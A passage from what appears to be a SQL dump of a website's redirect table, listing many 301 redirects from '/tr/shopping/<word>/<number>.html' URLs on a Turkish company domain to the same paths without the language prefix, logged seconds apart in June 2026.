00:00:00',301),(78499,'https://3s-technologies.com.tr/tr/shopping/pennigerous/1686263599.html',NULL,'https://3s-technologies.com.tr/shopping/pennigerous/1686263599.html','',1,0,'2026-06-11 11:14:07','0000-00-00 00:00:00',301),(78500,'https://3s-technologies.com.tr/tr/shopping/neura/3434162276.html',NULL,'https://3s-technologies.com.tr/shopping/neura/3434162276.html','',1,0,'2026-06-11 11:14:12','0000-00-00 00:00:00',301),(78501,'https://3s-technologies.com.tr/tr/shopping/tyrosine/1116539461.html',NULL,'https://3s-technologies.com.tr/shopping/tyrosine/1116539461.html','',1,0,'2026-06-11 11:14:17','0000-00-00 00:00:00',301),(78502,'https://3s-technologies.com.tr/tr/shopping/inscrutableness/2981187230.html',NULL,'https://3s-technologies.com.tr/shopping/inscrutableness/2981187230.html','',1,0,'2026-06-11 11:14:22','0000-00-00 00:00:00',301),(78503,'https://3s-technologies.com.tr/tr/shopping/powders/3258761181.html',NULL,'https://3s-technologies.com.tr/shopping/powders/3258761181.html','',1,0,'2026-06-11 11:14:27','0000-00-00 00:00:00',301),(78504,'https://3s-technologies.com.tr/tr/shopping/nonionic/620607176.html',NULL,'https://3s-technologies.com.tr/shopping/nonionic/620607176.html','',1,0,'2026-06-11 11:14:32','0000-00-00 00:00:00',301),(78505,'https://3s-technologies.com.tr/tr/shopping/woodcutter/3918097551.html',NULL,'https://3s-technologies.com.tr/shopping/woodcutter/3918097551.html','',1,0,'2026-06-11 11:14:37','0000-00-00 00:00:00',301),(78506,'https://3s-technologies.com.tr/tr/shopping/marsipobranchia/3735261365.html',NULL,'https://3s-technologies.com.tr/shopping/marsipobranchia/3735261365.html','',1,0,'2026-06-11 11:14:42','0000-00-00 00:00:00',301),(78507,'https://3s-technologies.com.tr/tr/shopping/angiocarpic/1600216170.html',NULL,'https://3s-technologies.com.tr/shopping/angiocarpic/1600216170.html','',1,0,'2026-06-11 11:14:47','0000-00-00 00:00:00',301),(78508,'https://3s-technologies.com.tr/tr/shopping/glyptemys/4236155675.html',NULL,'https://3s-technologies.com.tr/shopping/glyptemys/4236155675.html','',1,0,'2026-06-11 11:14:54','0000-00-00 00:00:00',301),(78509,'https://3s-technologies.com.tr/tr/shopping/laggard/3431574571.html',NULL,'https://3s-technologies.com.tr/shopping/laggard/3431574571.html','',1,0,'2026-06-11 11:14:59','0000-00-00 00:00:00',301),(78510,'https://3s-technologies.com.tr/tr/shopping/pronation/2405889432.html',NULL,'https://3s-technologies.com.tr/shopping/pronation/2405889432.html','',1,0,'2026-06-11 11:15:04','0000-00-00 00:00:00',301),(78511,'https://3s-technologies.com.tr/tr/shopping/aplodionotus/3572412336.html',NULL,'https://3s-technologies.com.tr/shopping/aplodionotus/3572412336.html','',1,0,'2026-06-11 11:15:09','0000-00-00 00:00:00',301),(78512,'https://3s-technologies.com.tr/tr/shopping/bookselling/1876250224.html',NULL,'https://3s-technologies.com.tr/shopping/bookselling/1876250224.html','',1,0,'2026-06-11 11:15:14','0000-00-00 00:00:00',301),(78513,'https://3s-technologies.com.tr/tr/shopping/loupgarou/3651404596.html',NULL,'https://3s-technologies.com.tr/shopping/loupgarou/3651404596.html','',1,0,'2026-06-11 11:15:22','0000-00-00 00:00:00',301),(78514,'https://3s-technologies.com.tr/tr/shopping/brachioganoidei/2457676706.html',NULL,'https://3s-technologies.com.tr/shopping/brachioganoidei/2457676706.html','',1,0,'2026-06-11 11:15:27','0000-00-00 00:00:00',301),(78515,'https://3s-technologies.com.tr/tr/shopping/spiritally/3398127223.html',NULL,'https://3s-technologies.com.tr/shopping/spiritally/3398127223.html','',1,0,'2026-06-11 11:15:32','0000-00-00 00:00:00',301),(78516,'https://3s-technologies.com.tr/tr/shopping/infinitesimally/3622773295.html',NULL,'https://3s-technologies.com.tr/shopping/infinitesimally/3622773295.html','',1,0,'2026-06-11 11:15:37','0000-00-00 00:00:00',301),(78517,'https://3s-technologies.com.tr/tr/shopping/skirrhus/4277175535.html',NULL,'https://3s-technologies.com.tr/shopping/skirrhus/4277175535.html','',1,0,'2026-06-11 11:15:42','0000-00-00 00:00:00',301),(78518,'https://3s-technologies.com.tr/tr/shopping/liberiencis/3858951965.html',NULL,'https://3s-technologies.com.tr/shopping/liberiencis/3858951965.html','',1,0,'2026-06-11 11:15:47','0000-00-00 00:00:00',301),(78519,'https://3s-technologies.com.tr/tr/shopping/moorband/3661746664.html',NULL,'https://3s-technologies.com.tr/shopping/moorband/3661746664.html','',1,0,'2026-06-11 11:15:52','0000-00-00 00:00:00',301),(78520,'https://3s-technologies.com.tr/tr/shopping/emboyssement/1217473380.html',NULL,'https://3s-technologies.com.tr/shopping/emboyssement/1217473380.html','',1,0,'2026-06-11 11:15:57','0000-00-00 00:00:00',301),(78521,'https://3s-technologies.com.tr/tr/shopping/mynheer/1830478037.html',NULL,'https://3s-technologies.com.tr/shopping/mynheer/1830478037.html','',1,0,'2026-06-11 11:16:02','0000-00-00 00:00:00',301),(78522,'https://3s-technologies.com.tr/tr/shopping/islandy/1359263636.html',NULL,'https://3s-technologies.com.tr/shopping/islandy/1359263636.html','',1,0,'2026-06-11 11:16:07','0000-00-00 00:00:00',301),(78523,'https://3s-technologies.com.tr/tr/shopping/cardines/1527913584.html',NULL,'https://3s-technologies.com.tr/shopping/cardines/1527913584.html','',1,0,'2026-06-11 11:16:12','0000-00-00 00:00:00',301),(78524,'https://3s-technologies.com.tr/tr/shopping/haustoria/2357693063.html',NULL,'https://3s-technologies.com.tr/shopping/haustoria/2357693063.html','',1,0,'2026-06-11 11:16:17','0000-00-00 00:00:00',301),(78525,'https://3s-technologies.com.tr/tr/shopping/lenticellate/2711603363.html',NULL,'https://3s-technologies.com.tr/shopping/lenticellate/2711603363.html','',1,0,'2026-06-11 11:16:22','0000-00-00 00:00:00',301),(78526,'https://3s-technologies.com.tr/tr/shopping/chamaecyparissus/3900397139.html',NULL,'https://3s-technologies.com.tr/shopping/chamaecyparissus/3900397139.html','',1,0,'2026-06-11 11:16:29','0000-00-00 00:00:00',301),(78527,'https://3s-technologies.com.tr/tr/shopping/trinoctial/1816154330.html',NULL,'https://3s-technologies.com.tr/shopping/trinoctial/1816154330.html','',1,0,'2026-06-11 11:16:34','0000-00-00 00:00:00',301),(78528,'https://3s-technologies.com.tr/tr/shopping/zamang/1055041139.html',NULL,'https://3s-technologies.com.tr/shopping/zamang/1055041139.html','',1,0,'2026-06-11 11:16:41','0000-00-00 00:00:00',301),(78529,'https://3s-technologies.com.tr/tr/shopping/dispassionateness/1975808505.html',NULL,'https://3s-technologies.com.tr/shopping/dispassionateness/1975808505.html','',1,0,'2026-06-11 11:16:44','0000-00-00 00:00:00',301),(78530,'https://3s-technologies.com.tr/tr/shopping/concertante/637866161.html',NULL,'https://3s-technologies.com.tr/shopping/concertante/637866161.html','',1,0,'2026-06-11 11:16:48','0000-00-00 00:00:00',301),(78531,'https://3s-technologies.com.tr/tr/shopping/rhachialgia/2451875819.html',NULL,'https://3s-technologies.com.tr/shopping/rhachialgia/2451875819.html','',1,0,'2026-06-11 11:16:54','0000-00-00 00:00:00',301),(78532,'https://3s-technologies.com.tr/tr/shopping/swagbelly/2069991261.html',NULL,'https://3s-technologies.com.tr/shopping/swagbelly/2069991261.html','',1,0,'2026-06-11 11:16:59','0000-00-00 00:00:00',301),(78533,'https://3s-technologies.com.tr/tr/shopping/taxifolia/3019878977.html',NULL,'https://3s-technologies.com.tr/shopping/taxifolia/3019878977.html','',1,0,'2026-06-11 11:17:04','0000-00-00 00:00:00',301),(78534,'https://3s-technologies.com.tr/tr/shopping/helot/3378607595.html',NULL,'https://3s-technologies.com.tr/shopping/helot/3378607595.html','',1,0,'2026-06-11 11:17:09','0000-00-00 00:00:00',301),(78535,'https://3s-technologies.com.tr/tr/shopping/aepyornis/2504235646.html',NULL,'https://3s-technologies.com.tr/shopping/aepyornis/2504235646.html','',1,0,'2026-06-11 11:17:14','0000-00-00 00:00:00',301),(78536,'https://3s-technologies.com.tr/tr/shopping/thornbill/737242639.html',NULL,'https://3s-technologies.com.tr/shopping/thornbill/737242639.html','',1,0,'2026-06-11 11:17:19','0000-00-00 00:00:00',301),(78537,'https://3s-technologies.com.tr/tr/shopping/courtlike/3687672161.html',NULL,'https://3s-technologies.com.tr/shopping/courtlike/3687672161.html','',1,0,'2026-06-11 11:17:23','0000-00-00 00:00:00',301),(78538,'https://3s-technologies.com.tr/tr/shopping/calendarial/3041560996.html',NULL,'https://3s-technologies.com.tr/shopping/calendarial/3041560996.html','',1,0,'2026-06-11 11:17:29','0000-00-00 00:00:00',301),(78539,'https://3s-technologies.com.tr/tr/shopping/siluroidei/1169158912.html',NULL,'https://3s-technologies.com.tr/shopping/siluroidei/1169158912.html','',1,0,'2026-06-11 11:17:37','0000-00-00 00:00:00',301),(78540,'https://3s-technologies.com.tr/tr/shopping/mertensia/2324245731.html',NULL,'https://3s-technologies.com.tr/shopping/mertensia/2324245731.html','',1,0,'2026-06-11 11:17:41','0000-00-00 00:00:00',301),(78541,'https://3s-technologies.com.tr/tr/shopping/grandnephew/4067834988.html',NULL,'https://3s-technologies.com.tr/shopping/grandnephew/4067834988.html','',1,0,'2026-06-11 11:17:46','0000-00-00 00:00:00',301),(78542,'https://3s-technologies.com.tr/tr/shopping/concelebrate/2508824434.html',NULL,'https://3s-technologies.com.tr/shopping/concelebrate/2508824434.html','',1,0,'2026-06-11 11:17:51','0000-00-00 00:00:00',301),(78543,'https://3s-technologies.com.tr/tr/shopping/enarthrodia/3361859674.html',NULL,'https://3s-technologies.com.tr/shopping/enarthrodia/3361859674.html','',1,0,'2026-06-11 11:17:56','0000-00-00 00:00:00',301),(78544,'https://3s-technologies.com.tr/tr/shopping/arachnology/3026025190.html',NULL,'https://3s-technologies.com.tr/shopping/arachnology/3026025190.html','',1,0,'2026-06-11 11:18:01','0000-00-00 00:00:00',301),(78545,'https://3s-technologies.com.tr/tr/shopping/antihysteric/1008056869.html',NULL,'https://3s-technologies.com.tr/shopping/antihysteric/1008056869.html','',1,0,'2026-06-11 11:18:06','0000-00-00 00:00:00',301),(78546,'https://3s-technologies.com.tr/tr/shopping/ruderary/1640050001.html',NULL,'https://3s-technologies.com.tr/shopping/ruderary/1640050001.html','',1,0,'2026-06-11 11:18:11','0000-00-00 00:00:00',301),(78547,'https://3s-technologies.com.tr/tr/shopping/irreverently/2753228189.html',NULL,'https://3s-technologies.com.tr/shopping/irreverently/2753228189.html','',1,0,'2026-06-11 11:18:16','0000-00-00 00:00:00',301),(78548,'https://3s-technologies.com.tr/tr/shopping/griseoviridis/816512803.html',NULL,'https://3s-technologies.com.tr/shopping/griseoviridis/816512803.html','',1,0,'2026-06-11 11:18:21','0000-00-00 00:00:00',301),(78549,'https://3s-technologies.com.tr/tr/shopping/verrugas/1442119452.html',NULL,'https://3s-technologies.com.tr/shopping/verrugas/1442119452.html','',1,0,'2026-06-11 11:18:26','0000-00-00 00:00:00',301),(78550,'https://3s-technologies.com.tr/tr/shopping/exorhizae/1614220605.html',NULL,'https://3s-technologies.com.tr/shopping/exorhizae/1614220605.html','',1,0,'2026-06-11 11:18:31','0000-00-00 00:00:00',301),(78551,'https://3s-technologies.com.tr/tr/shopping/economical/2577359597.html',NULL,'https://3s-technologies.com.tr/shopping/economical/2577359597.html','',1,0,'2026-06-11 11:18:36','0000-00-00 00:00:00',301),(78552,'https://3s-technologies.com.tr/tr/shopping/bloodshedder/3307744319.html',NULL,'https://3s-technologies.com.tr/shopping/bloodshedder/3307744319.html','',1,0,'2026-06-11 11:18:44','0000-00-00 00:00:00',301),(78553,'https://3s-technologies.com.tr/tr/shopping/wonderfulness/2239663714.html',NULL,'https://3s-technologies.com.tr/shopping/wonderfulness/2239663714.html','',1,0,'2026-06-11 11:18:49','0000-00-00 00:00:00',301),(78554,'https://3s-technologies.com.tr/tr/shopping/septuagenarian/219107656.html',NULL,'https://3s-technologies.com.tr/shopping/septuagenarian/219107656.html','',1,0,'2026-06-11 11:18:54','0000-00-00 00:00:00',301),(78555,'https://3s-technologies.com.tr/tr/shopping/pistillaceous/1800407410.html',NULL,'https://3s-technologies.com.tr/shopping/pistillaceous/1800407410.html','',1,0,'2026-06-11 11:18:59','0000-00-00 00:00:00',301),(78556,'https://3s-technologies.com.tr/tr/shopping/tubularian/1000698557.html',NULL,'https://3s-technologies.com.tr/shopping/tubularian/1000698557.html','',1,0,'2026-06-11 11:19:04','0000-00-00 00:00:00',301),(78557,'https://3s-technologies.com.tr/tr/shopping/sexdigitism/1972268293.html',NULL,'https://3s-technologies.com.tr/shopping/sexdigitism/1972268293.html','',1,0,'2026-06-11 11:19:09','0000-00-00 00:00:00',301),(78558,'https://3s-technologies.com.tr/tr/shopping/sportfulness/2214345366.html',NULL,'https://3s-technologies.com.tr/shopping/sportfulness/2214345366.html','',1,0,'2026-06-11 11:19:14','0000-00-00 00:00:00',301),(78559,'https://3s-technologies.com.tr/tr/shopping/amphiscii/3143872752.html',NULL,'https://3s-technologies.com.tr/shopping/amphiscii/3143872752.html','',1,0,'2026-06-11 11:19:21','0000-00-00 00:00:00',301),(78560,'https://3s-technologies.com.tr/tr/shopping/jahvist/3031989616.html',NULL,'https://3s-technologies.com.tr/shopping/jahvist/3031989616.html','',1,0,'2026-06-11 11:19:24','0000-00-00 00:00:00',301),(78561,'https://3s-technologies.com.tr/tr/shopping/truckage/1151198908.html',NULL,'https://3s-technologies.com.tr/shopping/truckage/1151198908.html','',1,0,'2026-06-11 11:19:29','0000-00-00 00:00:00',301),(78562,'https://3s-technologies.com.tr/tr/shopping/antichristianism/2432192652.html',NULL,'https://3s-technologies.com.tr/shopping/antichristianism/2432192652.html','',1,0,'2026-06-11 11:19:34','0000-00-00 00:00:00',301),(78563,'https://3s-technologies.com.tr/tr/shopping/amphiarthrosis/4205036440.html',NULL,'https://3s-technologies.com.tr/shopping/amphiarthrosis/4205036440.html','',1,0,'2026-06-11 11:19:39','0000-00-00 00:00:00',301),(78564,'https://3s-technologies.com.tr/tr/shopping/hornmad/1955520388.html',NULL,'https://3s-technologies.com.tr/shopping/hornmad/1955520388.html','',1,0,'2026-06-11 11:19:44','0000-00-00 00:00:00',301),(78565,'https://3s-technologies.com.tr/tr/shopping/intervent/891022304.html',NULL,'https://3s-technologies.com.tr/shopping/intervent/891022304.html','',1,0,'2026-06-11 11:19:52','0000-00-00 00:00:00',301),(78566,'https://3s-technologies.com.tr/tr/shopping/equality/217707569.html',NULL,'https://3s-technologies.com.tr/shopping/equality/217707569.html','',1,0,'2026-06-11 11:19:57','0000-00-00 00:00:00',301),(78567,'https://3s-technologies.com.tr/tr/shopping/dividing/2856534697.html',NULL,'https://3s-technologies.com.tr/shopping/dividing/2856534697.html','',1,0,'2026-06-11 11:20:02','0000-00-00 00:00:00',301),(78568,'https://3s-technologies.com.tr/tr/shopping/artefactual/2393772624.html',NULL,'https://3s-technologies.com.tr/shopping/artefactual/2393772624.html','',1,0,'2026-06-11 11:20:07','0000-00-00 00:00:00',301),(78569,'https://3s-technologies.com.tr/tr/shopping/marginicidal/1247588515.html',NULL,'https://3s-technologies.com.tr/shopping/marginicidal/1247588515.html','',1,0,'2026-06-11 11:20:12','0000-00-00 00:00:00',301),(78570,'https://3s-technologies.com.tr/tr/shopping/fuddle/202402060.html',NULL,'https://3s-technologies.com.tr/shopping/fuddle/202402060.html','',1,0,'2026-06-11 11:20:17','0000-00-00 00:00:00',301),(78571,'https://3s-technologies.com.tr/tr/shopping/compo/1890436604.html',NULL,'https://3s-technologies.com.tr/shopping/compo/1890436604.html','',1,0,'2026-06-11 11:20:22','0000-00-00 00:00:00',301),(78572,'https://3s-technologies.com.tr/tr/shopping/constituting/227278949.html',NULL,'https://3s-technologies.com.tr/shopping/constituting/227278949.html','',1,0,'2026-06-11 11:20:27','0000-00-00 00:00:00',301),(78573,'https://3s-technologies.com.tr/tr/shopping/nyctipithecus/1207566554.html',NULL,'https://3s-technologies.com.tr/shopping/nyctipithecus/1207566554.html','',1,0,'2026-06-11 11:20:32','0000-00-00 00:00:00',301),(78574,'https://3s-technologies.com.tr/tr/shopping/convocationist/1861968794.html',NULL,'https://3s-technologies.com.tr/shopping/convocationist/1861968794.html','',1,0,'2026-06-11 11:20:37','0000-00-00 00:00:00',301),(78575,'https://3s-technologies.com.tr/tr/shopping/disconsolate/1631569474.html',NULL,'https://3s-technologies.com.tr/shopping/disconsolate/1631569474.html','',1,0,'2026-06-11 11:20:42','0000-00-00 00:00:00',301),(78576,'https://3s-technologies.com.tr/tr/shopping/mostwhat/1741255623.html',NULL,'https://3s-technologies.com.tr/shopping/mostwhat/1741255623.html','',1,0,'2026-06-11 11:20:47','0000-00-00 00:00:00',301),(78577,'https://3s-technologies.com.tr/tr/shopping/quicktempered/1717754340.html',NULL,'https://3s-technologies.com.tr/shopping/quicktempered/1717754340.html','',1,0,'2026-06-11 11:20:52','0000-00-00 00:00:00',301),(78578,'https://3s-technologies.com.tr/tr/shopping/mannitol/1419449414.html',NULL,'https://3s-technologies.com.tr/shopping/mannitol/1419449414.html','',1,0,'2026-06-11 11:20:57','0000-00-00 00:00:00',301),(78579,'https://3s-technologies.com.tr/tr/shopping/restlessly/2960941406.html',NULL,'https://3s-technologies.com.tr/shopping/restlessly/2960941406.html','',1,0,'2026-06-11 11:21:02','0000-00-00 00:00:00',301),(78580,'https://3s-technologies.com.tr/tr/shopping/storthing/398353079.html',NULL,'https://3s-technologies.com.tr/shopping/storthing/398353079.html','',1,0,'2026-06-11 11:21:07','0000-00-00 00:00:00',301),(78581,'https://3s-technologies.com.tr/tr/shopping/kippered/8597303.html',NULL,'https://3s-technologies.com.tr/shopping/kippered/8597303.html','',1,0,'2026-06-11 11:21:12','0000-00-00 00:00:00',301),(78582,'https://3s-technologies.com.tr/tr/shopping/electorality/3257591375.html',NULL,'https://3s-technologies.com.tr/shopping/electorality/3257591375.html','',1,0,'2026-06-11 11:21:17','0000-00-00 00:00:00',301),(78583,'https://3s-technologies.com.tr/tr/shopping/pretemporal/1702659961.html',NULL,'https://3s-technologies.com.tr/shopping/pretemporal/1702659961.html','',1,0,'2026-06-11 11:21:22','0000-00-00 00:00:00',301),(78584,'https://3s-technologies.com.tr/tr/shopping/waffle/1106239686.html',NULL,'https://3s-technologies.com.tr/shopping/waffle/1106239686.html','',1,0,'2026-06-11 11:21:27','0000-00-00 00:00:00',301),(78585,'https://3s-technologies.com.tr/tr/shopping/northing/3676930959.html',NULL,'https://3s-technologies.com.tr/shopping/northing/3676930959.html','',1,0,'2026-06-11 11:21:32','0000-00-00 00:00:00',301),(78586,'https://3s-technologies.com.tr/tr/shopping/extilling/1576545195.html',NULL,'https://3s-technologies.com.tr/shopping/extilling/1576545195.html','',1,0,'2026-06-11 11:21:37','0000-00-00 00:00:00',301),(78587,'https://3s-technologies.com.tr/tr/shopping/wounding/329590705.html',NULL,'https://3s-technologies.com.tr/shopping/wounding/329590705.html','',1,0,'2026-06-11 11:21:42','0000-00-00 00:00:00',301),(78588,'https://3s-technologies.com.tr/tr/shopping/tridented/2493330905.html',NULL,'https://3s-technologies.com.tr/shopping/tridented/2493330905.html','',1,0,'2026-06-11 11:21:48','0000-00-00 00:00:00',301),(78589,'https://3s-technologies.com.tr/tr/shopping/iridize/2737293249.html',NULL,'https://3s-technologies.com.tr/shopping/iridize/2737293249.html','',1,0,'2026-06-11 11:21:52','0000-00-00 00:00:00',301),(78590,'https://3s-technologies.com.tr/tr/shopping/firsthand/3363114082.html',NULL,'https://3s-technologies.com.tr/shopping/firsthand/3363114082.html','',1,0,'2026-06-11 11:21:57','0000-00-00 00:00:00',301),(78591,'https://3s-technologies.com.tr/tr/shopping/freelancer/210531044.html',NULL,'https://3s-technologies.com.tr/shopping/freelancer/210531044.html','',1,0,'2026-06-11 11:22:02','0000-00-00 00:00:00',301),(78592,'https://3s-technologies.com.tr/tr/shopping/directrices/1537133453.html',NULL,'https://3s-technologies.com.tr/shopping/directrices/1537133453.html','',1,0,'2026-06-11 11:22:07','0000-00-00 00:00:00',301),(78593,'https://3s-technologies.com.tr/tr/shopping/amalgamize/1197013372.html',NULL,'https://3s-technologies.com.tr/shopping/amalgamize/1197013372.html','',1,0,'2026-06-11 11:22:12','0000-00-00 00:00:00',301),(78594,'https://3s-technologies.com.tr/tr/shopping/scram/2886441817.html',NULL,'https://3s-technologies.com.tr/shopping/scram/2886441817.html','',1,0,'2026-06-11 11:22:17','0000-00-00 00:00:00',301),(78595,'https://3s-technologies.com.tr/tr/shopping/hatchboat/3902604022.html',NULL,'https://3s-technologies.com.tr/shopping/hatchboat/3902604022.html','',1,0,'2026-06-11 11:22:22','0000-00-00 00:00:00',301),(78596,'https://3s-technologies.com.tr/tr/shopping/vegetatively/4175401055.html',NULL,'https://3s-technologies.com.tr/shopping/vegetatively/4175401055.html','',1,0,'2026-06-11 11:22:27','0000-00-00 00:00:00',301),(78597,'https://3s-technologies.com.tr/tr/shopping/craunching/3990950221.html',NULL,'https://3s-technologies.com.tr/shopping/craunching/3990950221.html','',1,0,'2026-06-11 11:22:32','0000-00-00 00:00:00',301),(78598,'https://3s-technologies.com.tr/tr/shopping/pained/2885047915.html',NULL,'https://3s-technologies.com.tr/shopping/pained/2885047915.html','',1,0,'2026-06-11 11:22:37','0000-00-00 00:00:00',301),(78599,'https://3s-technologies.com.tr/tr/shopping/grenadillo/172494940.html',NULL,'https://3s-technologies.com.tr/shopping/grenadillo/172494940.html','',1,0,'2026-06-11 11:22:42','0000-00-00 00:00:00',301),(78600,'https://3s-technologies.com.tr/tr/shopping/spuke/2111446363.html',NULL,'https://3s-technologies.com.tr/shopping/spuke/2111446363.html','',1,0,'2026-06-11 11:22:47','0000-00-00 00:00:00',301),(78601,'https://3s-technologies.com.tr/tr/shopping/leviticus/3579371514.html',NULL,'https://3s-technologies.com.tr/shopping/leviticus/3579371514.html','',1,0,'2026-06-11 11:22:55','0000-00-00 00:00:00',301),(78602,'https://3s-technologies.com.tr/tr/shopping/yuman/3294415380.html',NULL,'https://3s-technologies.com.tr/shopping/yuman/3294415380.html','',1,0,'2026-06-11 11:22:59','0000-00-00 00:00:00',301),(78603,'https://3s-technologies.com.tr/tr/shopping/eliminating/330802788.html',NULL,'https://3s-technologies.com.tr/shopping/eliminating/330802788.html','',1,0,'2026-06-11 11:23:04','0000-00-00 00:00:00',301),(78604,'https://3s-technologies.com.tr/tr/shopping/yelping/603460137.html',NULL,'https://3s-technologies.com.tr/shopping/yelping/603460137.html','',1,0,'2026-06-11 11:23:09','0000-00-00 00:00:00',301),(78605,'https://3s-technologies.com.tr/tr/shopping/pistoling/2903189722.html',NULL,'https://3s-technologies.com.tr/shopping/pistoling/2903189722.html','',1,0,'2026-06-11 11:23:14','0000-00-00 00:00:00',301),(78606,'https://3s-technologies.com.tr/tr/shopping/dialogistically/2804843524.html',NULL,'https://3s-technologies.com.tr/shopping/dialogistically/2804843524.html','',1,0,'2026-06-11 11:23:19','0000-00-00 00:00:00',301),(78607,'https://3s-technologies.com.tr/tr/shopping/quadrivalence/1012687966.html',NULL,'https://3s-technologies.com.tr/shopping/quadrivalence/1012687966.html','',1,0,'2026-06-11 11:23:24','0000-00-00 00:00:00',301),(78608,'https://3s-technologies.com.tr/tr/shopping/magnetizer/1301160441.html',NULL,'https://3s-technologies.com.tr/shopping/magnetizer/1301160441.html','',1,0,'2026-06-11 11:23:29','0000-00-00 00:00:00',301),(78609,'https://3s-technologies.com.tr/tr/shopping/promiscuousness/4170812267.html',NULL,'https://3s-technologies.com.tr/shopping/promiscuousness/4170812267.html','',1,0,'2026-06-11 11:23:34','0000-00-00 00:00:00',301),(78610,'https://3s-technologies.com.tr/tr/shopping/reserving/4214419832.html',NULL,'https://3s-technologies.com.tr/shopping/reserving/4214419832.html','',1,0,'2026-06-11 11:23:39','0000-00-00 00:00:00',301),(78611,'https://3s-technologies.com.tr/tr/shopping/cords/2654015376.html',NULL,'https://3s-technologies.com.tr/shopping/cords/2654015376.html','',1,0,'2026-06-11 11:23:44','0000-00-00 00:00:00',301),(78612,'https://3s-technologies.com.tr/tr/shopping/picturing/840827067.html',NULL,'https://3s-technologies.com.tr/shopping/picturing/840827067.html','',1,0,'2026-06-11 11:23:49','0000-00-00 00:00:00',301),(78613,'https://3s-technologies.com.tr/tr/shopping/tractableness/596283644.html',NULL,'https://3s-technologies.com.tr/shopping/tractableness/596283644.html','',1,0,'2026-06-11 11:23:54','0000-00-00 00:00:00',301),(78614,'https://3s-technologies.com.tr/tr/shopping/wallow/1983634456.html',NULL,'https://3s-technologies.com.tr/shopping/wallow/1983634456.html','',1,0,'2026-06-11 11:24:01','0000-00-00 00:00:00',301),(78615,'https://3s-technologies.com.tr/tr/shopping/metameric/3533928604.html',NULL,'https://3s-technologies.com.tr/shopping/metameric/3533928604.html','',1,0,'2026-06-11 11:24:05','0000-00-00 00:00:00',301),(78616,'https://3s-technologies.com.tr/tr/shopping/stomate/3544712083.html',NULL,'https://3s-technologies.com.tr/shopping/stomate/3544712083.html','',1,0,'2026-06-11 11:24:10','0000-00-00 00:00:00',301),(78617,'https://3s-technologies.com.tr/tr/shopping/gorcock/1837437247.html',NULL,'https://3s-technologies.com.tr/shopping/gorcock/1837437247.html','',1,0,'2026-06-11 11:24:15','0000-00-00 00:00:00',301),(78618,'https://3s-technologies.com.tr/tr/shopping/anhydrite/1398883409.html',NULL,'https://3s-technologies.com.tr/shopping/anhydrite/1398883409.html','',1,0,'2026-06-11 11:24:20','0000-00-00 00:00:00',301),(78619,'https://3s-technologies.com.tr/tr/shopping/chastize/1354323321.html',NULL,'https://3s-technologies.com.tr/shopping/chastize/1354323321.html','',1,0,'2026-06-11 11:24:25','0000-00-00 00:00:00',301),(78620,'https://3s-technologies.com.tr/tr/shopping/consigne/3620391390.html',NULL,'https://3s-technologies.com.tr/shopping/consigne/3620391390.html','',1,0,'2026-06-11 11:24:30','0000-00-00 00:00:00',301),(78621,'https://3s-technologies.com.tr/tr/shopping/agathis/4043345702.html',NULL,'https://3s-technologies.com.tr/shopping/agathis/4043345702.html','',1,0,'2026-06-11 11:24:35','0000-00-00 00:00:00',301),(78622,'https://3s-technologies.com.tr/tr/shopping/coraciiformes/2174320306.html',NULL,'https://3s-technologies.com.tr/shopping/coraciiformes/2174320306.html','',1,0,'2026-06-11 11:24:40','0000-00-00 00:00:00',301),(78623,'https://3s-technologies.com.tr/tr/shopping/lemur/648461636.html',NULL,'https://3s-technologies.com.tr/shopping/lemur/648461636.html','',1,0,'2026-06-11 11:24:45','0000-00-00 00:00:00',301),(78624,'https://3s-technologies.com.tr/tr/shopping/tenuating/2334841222.html',NULL,'https://3s-technologies.com.tr/shopping/tenuating/2334841222.html','',1,0,'2026-06-11 11:24:50','0000-00-00 00:00:00',301),(78625,'https://3s-technologies.com.tr/tr/shopping/ingenuously/2726740035.html',NULL,'https://3s-technologies.com.tr/shopping/ingenuously/2726740035.html','',1,0,'2026-06-11 11:24:55','0000-00-00 00:00:00',301),(78626,'https://3s-technologies.com.tr/tr/shopping/knoud/162152856.html',NULL,'https://3s-technologies.com.tr/shopping/knoud/162152856.html','',1,0,'2026-06-11 11:25:02','0000-00-00 00:00:00',301),(78627,'https://3s-technologies.com.tr/tr/shopping/seniority/1965067303.html',NULL,'https://3s-technologies.com.tr/shopping/seniority/1965067303.html','',1,0,'2026-06-11 11:25:06','0000-00-00 00:00:00',301),(78628,'https://3s-technologies.com.tr/tr/shopping/embrocation/1743679837.html',NULL,'https://3s-technologies.com.tr/shopping/embrocation/1743679837.html','',1,0,'2026-06-11 11:25:11','0000-00-00 00:00:00',301),(78629,'https://3s-technologies.com.tr/tr/shopping/franchisement/4076006265.html',NULL,'https://3s-technologies.com.tr/shopping/franchisement/4076006265.html','',1,0,'2026-06-11 11:25:16','0000-00-00 00:00:00',301),(78630,'https://3s-technologies.com.tr/tr/shopping/gemshorn/3601478895.html',NULL,'https://3s-technologies.com.tr/shopping/gemshorn/3601478895.html','',1,0,'2026-06-11 11:25:21','0000-00-00 00:00:00',301),(78631,'https://3s-technologies.com.tr/tr/shopping/skegger/2176744488.html',NULL,'https://3s-technologies.com.tr/shopping/skegger/2176744488.html','',1,0,'2026-06-11 11:25:26','0000-00-00 00:00:00',301),(78632,'https://3s-technologies.com.tr/tr/shopping/stetted/1461681389.html',NULL,'https://3s-technologies.com.tr/shopping/stetted/1461681389.html','',1,0,'2026-06-11 11:25:31','0000-00-00 00:00:00',301),(78633,'https://3s-technologies.com.tr/tr/shopping/misplead/1819736835.html',NULL,'https://3s-technologies.com.tr/shopping/misplead/1819736835.html','',1,0,'2026-06-11 11:25:36','0000-00-00 00:00:00',301),(78634,'https://3s-technologies.com.tr/tr/shopping/depressive/84276610.html',NULL,'https://3s-technologies.com.tr/shopping/depressive/84276610.html','',1,0,'2026-06-11 11:25:41','0000-00-00 00:00:00',301),(78635,'https://3s-technologies.com.tr/tr/shopping/ustion/1940961086.html',NULL,'https://3s-technologies.com.tr/shopping/ustion/1940961086.html','',1,0,'2026-06-11 11:25:46','0000-00-00 00:00:00',301),(78636,'https://3s-technologies.com.tr/tr/shopping/petechial/2369500669.html',NULL,'https://3s-technologies.com.tr/shopping/petechial/2369500669.html','',1,0,'2026-06-11 11:25:51','0000-00-00 00:00:00',301),(78637,'https://3s-technologies.com.tr/tr/shopping/inopinable/3751398135.html',NULL,'https://3s-technologies.com.tr/shopping/inopinable/3751398135.html','',1,0,'2026-06-11 11:25:57','0000-00-00 00:00:00',301),(78638,'https://3s-technologies.com.tr/tr/shopping/ferris/3183163264.html',NULL,'https://3s-technologies.com.tr/shopping/ferris/3183163264.html','',1,0,'2026-06-11 11:26:02','0000-00-00 